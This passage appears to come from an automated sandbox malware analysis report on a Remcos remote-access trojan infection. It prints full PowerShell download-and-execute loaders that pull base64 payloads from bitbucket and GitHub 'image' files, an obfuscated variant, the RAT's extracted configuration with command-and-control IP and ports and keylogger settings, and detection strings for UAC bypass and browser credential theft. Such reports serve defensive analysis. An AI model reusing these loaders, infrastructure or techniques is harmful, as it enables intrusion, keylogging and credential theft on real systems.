txt.mpcfSnk/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
                        • RegAsm.exe (PID: 7660 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
                          • RegAsm.exe (PID: 2072 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
                          • RegAsm.exe (PID: 3632 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
                          • RegAsm.exe (PID: 2552 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
                          • RegAsm.exe (PID: 2024 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yzbzlbqtwhlotogkfeks" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
                          • RegAsm.exe (PID: 1992 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\itgslubvspdbecuopgxmttf" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
                          • RegAsm.exe (PID: 3896 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\itgslubvspdbecuopgxmttf" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
                          • wscript.exe (PID: 2524 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ilkgo.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
      • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 2836 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • InnoCraft.scr (PID: 400 cmdline: "C:\Users\user\AppData\Local\DesignInno Innovations\InnoCraft.scr" "C:\Users\user\AppData\Local\DesignInno Innovations\H" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
{"Host:Port:Password": "101.99.94.69:2404:1101.99.94.69:8090:1101.99.94.69:44444:1101.99.94.69:80:1101.99.94.69:21:0101.99.94.69:4899:0", "Assigned name": "host_one", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UP4CTA", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\rmc\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000021.00000002.1767314740.00000000012AB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4b8:$a1: Remcos restarted by watchdog!
            • 0x6ca30:$a3: %02i:%02i:%02i:%03i
            Click to see the 15 entries
            SourceRuleDescriptionAuthorStrings
            33.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              33.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                33.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  33.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6c4b8:$a1: Remcos restarted by watchdog!
                  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
                  33.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6657c:$str_b2: Executing file:
                  • 0x675fc:$str_b3: GetDirectListeningPort
                  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x67128:$str_b7: \update.vbs
                  • 0x665a4:$str_b9: Downloaded file:
                  • 0x66590:$str_b10: Downloading file:
                  • 0x66634:$str_b12: Failed to upload file:
                  • 0x675c4:$str_b13: StartForward
                  • 0x675e4:$str_b14: StopForward
                  • 0x67080:$str_b15: fso.DeleteFile "
                  • 0x67014:$str_b16: On Error Resume Next
                  • 0x670b0:$str_b17: fso.DeleteFolder "
                  • 0x66624:$str_b18: Uploaded file:
                  • 0x665e4:$str_b19: Unable to delete:
                  • 0x67048:$str_b20: while fso.FileExists("
                  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 7 entries
                  SourceRuleDescriptionAuthorStrings
                  amsi64_7696.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                    amsi64_1280.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                      Spreading

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.crijFkF/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] (' txt.crijFkF/sdaolnwod/fwf/wfsfwf/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 6706e721f2c06.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7440, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs" , ProcessId: 7512, ProcessName: wscript.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 6706e721f2c06.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7440, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs" , ProcessId: 7512, ProcessName: wscript.exe
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 6706e721f2c06.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7440, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\6706e721f2c06.vbs" , ProcessId: 7512, ProcessName: wscript.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\6706e721f2c06.exe, ProcessId: 7372, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Lucas.pif s, CommandLine: Lucas.pif s, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\603423\Lucas.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\603423\Lucas.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\603423\Lucas.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Kits Kits.bat & Kits.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8040, ParentProcessName: cmd.exe, ProcessCommandLine: Lucas.pif s, ProcessId: 7500, ProcessName: Lucas.pif
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 7660, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\owopkjfaiztjrikg", ProcessId: 2072, ProcessName: RegAsm.exe
